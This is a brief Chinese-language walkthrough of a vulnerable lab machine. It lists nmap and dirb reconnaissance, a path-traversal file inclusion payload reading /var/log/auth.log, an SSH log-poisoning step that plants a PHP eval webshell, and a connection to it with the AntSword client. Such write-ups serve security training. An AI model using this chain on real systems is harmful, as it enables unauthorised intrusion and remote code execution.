1、启动靶机

2、通过nmap -sA 192.168.168.0/24得到靶机IP

3、扫描目录

用dirb http://192.168.49.128扫描敏感目录

4、访问敏感目录

5、通过查看源码，发现其存在文件包含漏洞，利用该漏洞查看日志文件

http://192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

6、ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.49.128 -p 2211

7、用蚁剑连接一句话木马